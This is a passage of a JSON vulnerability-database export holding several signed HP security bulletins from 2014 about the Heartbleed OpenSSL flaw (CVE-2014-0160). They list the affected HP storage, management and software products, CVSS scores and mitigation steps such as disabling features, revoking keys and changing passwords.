for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNP3uIACgkQ4B86/C0qfVm3kQCgrhhP0/att4M8wopB81/dAlzX\r\nBXMAoOMhgToWBG9l+JKMLuOaORt3BhE1\r\n=J4SK\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30474", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30474", "title": "[security bulletin] HPSBGN03010 rev.1 - HP Software Server Automation, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260637\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260637\r\nVersion: 1\r\n\r\nHPSBST03000 rev.1 - HP StoreEver ESL G3 Tape Library and Enterprise Library\r\nLTO-6 Tape Drives running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-22\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreEver ESL\r\nG3 Tape Library and Enterprise Library LTO-6 Tape Drives running OpenSSL.\r\nThis is the OpenSSL vulnerability known as "Heartbleed" which could be\r\nexploited remotely resulting in disclosure of 
information.\r\n\r\nReferences: CVE-2014-0160, SSRT101513\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP StoreEver ESL G3 Tape Libraries with MCB rev 2 OpenSSL version1.0.1f for\r\nthe following firmware versions:\r\n\r\n671H_GS00601\r\n665H_GS12501\r\n663H_GS04601\r\n\r\nHP StoreEver ESL G3 Tape Libraries with MCB rev 1 Open SSL version 1.0.1e in\r\n655H firmware versions:\r\n\r\n655H_GS10201\r\n\r\nHP StoreEver Enterprise Library LTO-6 Tape Drives: all firmware versions.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nfirmware versions of HP StoreEver ESL G3 Tape Library and Enterprise Library\r\nLTO-6 Tape Drives. This bulletin will be revised when the software updates\r\nare released.\r\n\r\nHP recommends the following mitigation or workaround that can reduce the\r\nlikelihood of an attacker being able to exploit the "Heartbleed"\r\nvulnerability for the HP StoreEver ESL G3 Tape Library and the StoreEver\r\nEnterprise Library LTO-6 Tape Drives:\r\n\r\nThe following configuration options that allow access to the Heartbeat\r\nfunction in the vulnerable versions of OpenSSL are not enabled by default.\r\nVerify that the following options are "disabled" using the Tape Library GUI:\r\n\r\nSecure SMI-S\r\nCVTL User\r\n\r\nNote: disabling these features blocks the vulnerable OpenSSL function in both\r\nthe ESL G3 Tape Library and the StoreEver Enterprise Library LTO-6 Tape\r\nDrives. 
The basic functionality of the library is not affected by these\r\nconfiguration changes and SSL access to the user interface is not blocked by\r\nthese settings.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. 
To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNW3r0ACgkQ4B86/C0qfVldywCgwtbUfxEMhVuvS81AIP12vW0H\r\nw18AoKFRVIVVjcYhdl94betQ8xPal2sU\r\n=MhNP\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30507", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30507", "title": "[security bulletin] HPSBST03000 rev.1 - HP StoreEver ESL G3 Tape Library and Enterprise Library LTO-6 Tape Drives running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04248997\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04248997\r\nVersion: 1\r\n\r\nHPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this 
Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-16\r\nLast Updated: 2014-04-16\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101516)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nService Manager, 9.32 (including all patches), 9.33 (GA,9.33 p1, 9.33-p1-rev1\r\n& 9.33.p2)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843525\r\n\r\nHP recommends following the Service Manager guidelines and completing the\r\nfollowing action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and 
cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 16 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNPHNsACgkQ4B86/C0qfVmMwQCgi9CnzzUd9g7tjfv9xFQ32BSs\r\nWG0AoPOEoiZs9gYLWbaBwacUhVaC5mGV\r\n=oGCq\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30473", "title": "[security bulletin] HPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260505\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260505\r\nVersion: 1\r\n\r\nHPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software Asset\r\nmanager running OpenSSL. The Heartbleed vulnerability was detected in\r\nspecific OpenSSL versions. OpenSSL is a 3rd party product that is embedded\r\nwith some of HP Software products. 
This bulletin objective is to notify HP\r\nSoftware customers about products affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101529)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Asset Manager 9.40 (including all patches) HP Cloud System Chargeback 9.40\r\n(including all patches)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00863578\r\n\r\nHP recommends following Asset Manager guidelines including the following\r\naction items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. 
operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company 
shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNWbHwACgkQ4B86/C0qfVl2AgCg+g9OYkOXmavhzO8oNrQAqZEC\r\ngnkAoJ7e9mgEcg6wSdzVzykAsNISIB7E\r\n=v1pz\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30508", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30508", "title": "[security bulletin] HPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04261644\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04261644\r\nVersion: 2\r\n\r\nHPSBST03015 rev.2 - HP 3PAR OS running OpenSSL, 
Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-23\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP 3PAR OS\r\nrunning OpenSSL. This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101526\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP 3PAR OS 3.1.2 and subsequent\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nsoftware versions of 3PAR OS. This bulletin will be revised when the software\r\nupdates are released.\r\n\r\nUntil the software update is available, HP recommends limiting 3PAR OS\r\nManagement Tools to use only on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\nVersion:2 (rev.2) - 23 April 2014 Added recommendation for use of 3PAR OS\r\nManagement Tools\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNYMYwACgkQ4B86/C0qfVmSXwCcDoqspliALHdporVpYpZ7t6jF\r\nOnQAn0ec0FZvxPMxM0Uk/iQ7K2kmO1DT\r\n=ORml\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30504", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30504", "title": "[security bulletin] HPSBST03015 rev.2 - HP 3PAR OS running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236062\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236062\r\nVersion: 1\r\n\r\nHPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP BladeSystem\r\nc-Class Onboard Administrator (OA) running OpenSSL. 
This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101500\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP BladeSystem c-Class Onboard Administrator (OA) v4.11 and 4.20\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Onboard Administrator (OA). This bulletin will be revised when\r\nthe software updates are released.\r\n\r\nNotes\r\n\r\nCustomers also have the option to downgrade OA firmware to any version prior\r\nto OA v4.11 if that meets the requisite Hardware/feature support for the\r\nenclosure configuration.\r\nNo action is required unless the OA is running the firmware versions\r\nexplicitly listed as vulnerable.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVmEFACggs/Q1GaEsxwM9Vq17prvnMA9\r\nzwsAn08KV2HUERq6QUThuGZ4USDSSh9S\r\n=ItbO\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30475", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30475", "title": "[security bulletin] HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239375\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239375\r\nVersion: 1\r\n\r\nHPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Smart Update\r\nManager (SUM) running OpenSSL.This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101503\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY 
